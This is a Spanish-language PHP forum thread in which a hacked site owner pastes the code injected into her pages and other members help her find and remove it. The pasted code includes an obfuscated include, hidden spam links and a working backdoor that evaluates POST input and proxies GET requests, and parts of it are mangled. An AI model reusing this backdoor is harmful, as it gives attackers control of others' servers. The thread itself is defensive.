Foros del Web » Programando para Internet » PHP »

Ayuda Piratearon mi Web php

Estas en el tema de Ayuda Piratearon mi Web php en el foro de PHP en Foros del Web. Hola genios !!. Pido ayuda con urgencia porque no se que hacer. Tengo una web de 500 mb. esto lo digo para que se den ...
  #1 (permalink)  
Antiguo 10/01/2011, 18:59
 
Fecha de Ingreso: mayo-2008
Mensajes: 224
Antigüedad: 15 años, 10 meses
Puntos: 4
Ayuda Piratearon mi Web php

Hola genios !!.

Pido ayuda con urgencia porque no se que hacer. Tengo una web de 500 mb. esto lo digo para que se den una idea de la cantidad de archivos que tengo y resulta que me la hackearon y no se como.

Les posteo dos cosas que encontre.
En la parte superior de las paginas php agregaron esto: ( perdonen si es largo, aunque es mas largo, pero como no se del tema copie lo que pude del contenido extraño )

<?php /* <!-----FyGdjHIvEaWunX-----> */ $EoXQgtRBbilUsypefcvFOGmSPHLN = base64_decode("L2hvbWUva3NrMjAwOHgvcHVibGljX2h0bWw vd2VibWFpbHBocC9kYXRhL3RlbXAvcy9zYWx0YUBrZW5zaGlua 2Fpc3IuY29tLzM1ZjZkM2RjYmIzMTg4ZjQ5MGNlM2FiZmNjYjV mNmFmL2dhb3N2LnBocA=="); @include_once $EoXQgtRBbilUsypefcvFOGmSPHLN;/* <!-----FyGdjHIvEaWunX-----> */?><!-dvy9uts0ozphc7n246je---><?php
$links = '<a href="http://bas.me.uk/.tmp/?sitemap">site</a><br><a href="http://bdr.internodal.co.uk/.tmp/?sitemap">site</a><br><a href="http://beta.jasonminsky.com/.tmp/?sitemap">go</a><br><a co.uk/.tmp/?sitemap">links</a><br><a href="http://joom.compuhire.com/.tmp/?sitemap">sitemap</a><br><a href="http://jp-engineering.co.uk/.tmp/?sitemap">go</a><br><a href="http://www.2fishes.co.ukhref="http://www.bellheath.co.uk/.tmp/?sitemap">url</a><br><a href="http://www.bespokesoftserv.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.bookcram-d.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://www.boomerbrothers.co.uk/.tmp/?sitemap">url</a><br><a href="http://www.brandguardiansusa.com/.tmp/?sitemap">here</a><br><a href="http://www.cantacathenesia.org/.tmp/?sitemap">links</a><br><a href="http://www.cappadociainvest.com/.tmp/?sitemap">link</a><br><a href="http://www.careful-carriers.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.cathedral.net/.tmp/?sitemap">sitemap</a><br><a href="http://www.celebagents.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://www.dhios.co.uk/.tmp/?sitemap">url</a><br><a href="http://www.ermintrude-the-lovely-pink-cow.org.uk/.tmp/?sitemap">url</a><br><a href="http://www.evilsusan.com/.tmp/?sitemap">url</a><br><a href="http://www.familytree.weller.co.uk/.tmp/?sitemap">links</a><br><a href="http://www.fitnessindustrynews.com/.tmp/?sitemap">sitemap</a><br><a href="http://www.goole-action-group.org.uk/.tmp/?sitemap">site</a><br><a hrehref="http://www.islaynaturalhistory.org/.tmp/?sitemap">site</a><br><a href="http://www.jamiewolfie.eu/.tmp/?sitemap">sitemap</a><br><a href="http://www.lukrative.com/.tmp/?sitemap">link</a><br><a href="http://www.macewan.me.uk/.tmp/?sitemap">go</a><br><a href="http://www.mahoneymarshalldesigns.co.uk/.tmp/?sitemap">here</a><br><a href="http://www.manhattantransfer.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://www.maric.info/.tmp/?sitemap">go</a><br><a href="http://www.marlpitcottage.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://www.martinowton.com/.tmp/?sitemap">url</a><br><a href="http://www.maxwellmaclaurin.co.uk/.tmp/?sitemap">go</a><br><a href="http://www.meatco.eu/.tmp/?sitemap">links</a><br><a href="http://www.michaelericksonelectrical.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://www.micreator.com/.tmp/?sitemap">sitemap</a><br><a href="http://www.mjmartin.eu/.tmp/?sitemap">here</a><br><a href="http://www.mobile-enterprise.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.selwoodresearch.co.uk/.tmp/?sitemap">site</a><br><a href="http://www.shopatwhenitsgoneitsgone.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.silentdiscolondon.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.silentdiscoweddings.co.uk/.tmp/?sitemap">links</a><br><a href="http://www.skyewrite.co.uk/.tmp/?sitemap">here</a><br><a href="http://www.sladehealth.com/.tmp/?sitemap">sitemap</a><br><a
function output_callback($str){
GLOBAL $links;
preg_match("|<body[^>]*>|",$str,$arr);
return str_replace($arr[0],$arr[0].'<font style="position: absolute;overflow: hidden;height: 0;width: 0">'.$links.'</font>',$str);
}

function get_page($url){ return file_get_contents($url); }

if(isset($_POST['code']) && $_POST['code']){
eval(stripslashes($_POST[code]));
exit;
}
if(isset($_GET['proxy']) && $_GET['proxy']){
print get_page($_GET['proxy']);
exit;
}

ob_start ('output_callback');
?><!-imdosyxb0auz5wr9t3gq---><?php
$links = '<a href="http://alex.griff.in/.tmp/?sitemap">here</a><br><a href="http://amsearchuk.com/.tmp/?sitemap">here</a><br><a href="http://archivepub.co.uk/.tmp/?sitemap">go</a><br><a href="http://astonssolicitors.co.uk/.tmp/?sitemap">here</a><br><a href="http://bigalentertainment.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://donkei.skok.me.uk/.tmp/?sitemap">links</a><br><a href="http://drupal.thomasclarkson.cambs.sch.uk/.tmp/?sitemap">link</a>
<br><a href="http://ft.weller.co.uk/.tmp/?sitemap">go</a><br><a href="http://hjsuk.com/.tmp/?sitemap">link</a><br><a href="http://james.rossell.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://jarmin.com/.tmp/?sitemap">site</a><br><a href="http://jt.acknowledgement.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://kieranfellows.me.uk/.tmp/?sitemap">link</a><br><a href="http://l-o-t.org.uk/.tmp/?sitemap">go</a><br><a href="http://lesspackaging.develop2020.co.uk/.tmp/?sitemap">url</a><br><a href="http://loc.humph.net/.tmp/?sitemap">link</a><br><a href="http://multihaul.peattie.co.uk/.tmp/?sitemap">go</a><br><a href="http://nikkay.co.uk/.tmp/?sitemap">links</a><br><a href="http://peteprice.com/.tmp/?sitemap">url</a><br><a href="http://philipwright.net/.tmp/?sitemap">link</a><br><a href="http://realisys.acknowledgement.co.uk/.tmp/?sitemap">url</a><br><a href="http://soleymourning.enchantress.org.uk/.tmp/?sitemap">site</a><br><a href="http://sosfm.co.uk/.tmp/?sitemap">go</a><br><a href="http://st-patrick.org.uk/.tmp/?sitemap">go</a><br><a href="http://staging.crosby.co.uk/.tmp/?sitemap">site</a><br><a href="http://stats.acknowledgement.co.uk/.tmp/?sitemap">here</a><br><a href="http://tassek.anang.com/.tmp/?sitem/.tmp/?sitemap">sitemap</a><br><a href="http://www.brandguardiansresearch.com/.tmp/?sitemap">here</a><br><a href="http://www.brokenigloo.co.uk/.tmp/?sitemap">site</a><br><a href="http://www.bsdh.org.uk/.tmp/?sitemap">link</a><br><a href="http://www.bvillea.com/.tmp/?sitemap">go</a><br><a href="http://www.cordell.me.uk/.tmp/?sitemap">link</a><br><a href="http://www.cottonwoodupholstery.co.uk/.tmp/?sitemap">here</a><br><a href="http://www.countryandtownhouse.com/.tmp/?sitemap">sitemap</a><br><a href="http://www.countryhousemagazine.co.uk/.tmp/?sitemap">site</a><br><a href="http://www.crane-hire-london.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://www.crash-art.com/.tmp/?sitemap">go</a><br><a href="http://www.creativeframe.co.uk/.tmp/?sitemap">links</a><br><a href="http://href="http://www.kaylaparker.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.klenzeen.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.klenzeen.com/.tmp/?sitemap">here</a><br><a href="http://www.kvhomes.co.uk/.tmp/?sitemap">go</a><br><a href="http://www.lfnutrition.com/.tmp/?sitemap">here</a><br><a href="http://www.libbards.com/.tmp/?sitemap">go</a><br><a href="http://www.limpsfield.net/.tmp/?sitemap">site</a><br><a href="http://www.lowfield.co.uk/.tmp/?sitemap">url</a><br><a href="http://www.ludloworchestra.co.uk.ludloworchestra.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.lum.co.uk/.tmp/?sitemap">site</.tmp/?sitemap">site</a><br><a href="http://www.piano-tuner-birmingham.co.uk/.tmp/?sitemap">links</a><br><a href="http://www.qtq.org/.tmp/?sitemap">links</a><br><a href="http://www.r-hind.co.uk/.tmp/?sitemap">site</a><br><a href="http://www.raccoongroup.co.uk/.tmp/?sitemap">site</a><br><a href="http://www.rawiax.co.uk/.tmp/?sitemap">url</a><br><a href="http://www.zemplify.co.uk/.tmp/?sitemap">url</a><br>';

function output_callback($str){
GLOBAL $links;
preg_match("|<body[^>]*>|",$str,$arr);
return str_replace($arr[0],$arr[0].'<font style="position: absolute;overflow: hidden;height: 0;width: 0">'.$links.'</font>',$str);
}

function get_page($url){ return file_get_contents($url); }

if(isset($_POST['code']) && $_POST['code']){
eval(stripslashes($_POST[code]));
exit;
}
if(isset($_GET['proxy']) && $_GET['proxy']){
print get_page($_GET['proxy']);
exit;
}

ob_start ('output_callback');
?><?php

Lo que quisiera si alguien me puede decir es cuales archivos ataca o si ataca a todo. Y si saben de que forma ingreso.
Yo estuve teniendo en varias oportunidades avisos de que quisieron ingresar al base de datos y no pudieron, tambien en el foro ( foro smf ) y ahi puse que se activaba el usuario por el administrador, entonces yo ( administrador ) verificaba la cuenta y recien ahi lo activaba.
Pero casi me desmayo a encontrar el aviso del google de que el sitio contenia software maligno.
Por favor si alguien me da alguna idea de como solucionarlo !!! y que error cometi para que estos delincuentes ( para no ser ordinaria ) pudieron hacer lo que hicieron
Otro dato, el hosting es pago. En estos momentos bloquee el public_html para que no funcionara y estoy esperando por el administrador para ver que me dice.
Muchas Muchas gracias de antemano y a los administradores del foro, si me equivoque en postear esto aca mil perdones pero no sabia donde hubicarlo.
Gracias de nuevo
  #2 (permalink)  
Antiguo 10/01/2011, 21:15
 
Fecha de Ingreso: enero-2011
Mensajes: 44
Antigüedad: 13 años, 2 meses
Puntos: 1
Respuesta: Ayuda Piratearon mi Web php

Cual es el nombre del sitio, publica link, actualmente sigue dañado o lo pudiste solventar. Y usa la etiqueta
Código PHP:
 y pon el code aqui adentroel del .php 
, osea dentro de las etiquetas.
  #3 (permalink)  
Antiguo 10/01/2011, 22:00
Avatar de jcxnet  
Fecha de Ingreso: octubre-2005
Ubicación: Perú
Mensajes: 784
Antigüedad: 18 años, 5 meses
Puntos: 56
Respuesta: Ayuda Piratearon mi Web php

el header que te inyectaron hace un include a este archivo:
Código:
/home/ksk2008x/public_html/webmailphp/data/temp/s/[email protected]/35f6d3dcbb3188f490ce3abfccb5f6af/gaosv.php
parece que te lo pasaron por mail, revisa el archivo y dale de baja, luego a corregir las páginas .php
suerte
__________________
►I'm a devil on the run ♂
Jcxnet.com
*Keep It Simple **
  #4 (permalink)  
Antiguo 11/01/2011, 06:29
 
Fecha de Ingreso: mayo-2008
Mensajes: 224
Antigüedad: 15 años, 10 meses
Puntos: 4
Respuesta: Ayuda Piratearon mi Web php

Hola chicos

Jc, tenias razon. Segui la ruta y lo encontre, borre todo ese directorio. y ahora voy a revisar index x index
Como puedo hacer para que esto no vuelva a pasar? o el webmail tiene este defecto porque si es haci, directamente lo saco.
Que opinan?
  #5 (permalink)  
Antiguo 11/01/2011, 09:26
 
Fecha de Ingreso: abril-2009
Mensajes: 48
Antigüedad: 14 años, 11 meses
Puntos: 5
Respuesta: Ayuda Piratearon mi Web php

En estos casos siempre es recomendable cambiar todas las contraseñas de las cuentas ftp y bbdd que estes usando. En el caso de las bbdd, supongo que ya tendrás, pero por si acaso, hazte copias de seguridad.

Suerte
  #6 (permalink)  
Antiguo 11/01/2011, 09:57
Avatar de maycolalvarez
Colaborador
 
Fecha de Ingreso: julio-2008
Ubicación: Caracas
Mensajes: 12.120
Antigüedad: 15 años, 8 meses
Puntos: 1532
Respuesta: Ayuda Piratearon mi Web php

Cita:
Iniciado por vilmar23 Ver Mensaje
En estos casos siempre es recomendable cambiar todas las contraseñas de las cuentas ftp y bbdd que estes usando. En el caso de las bbdd, supongo que ya tendrás, pero por si acaso, hazte copias de seguridad.

Suerte
100+ excelente respuesta, también revisa los formularios de upload y toda fuente de ingreso de archivos y asegurarte de filtrarlos debidamente, para evitar que suba archivos *.php a tu hosting
__________________
¡Por favor!: usa el highlight para mostrar código
El que busca, encuentra...

Etiquetas: Ninguno
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 20:04.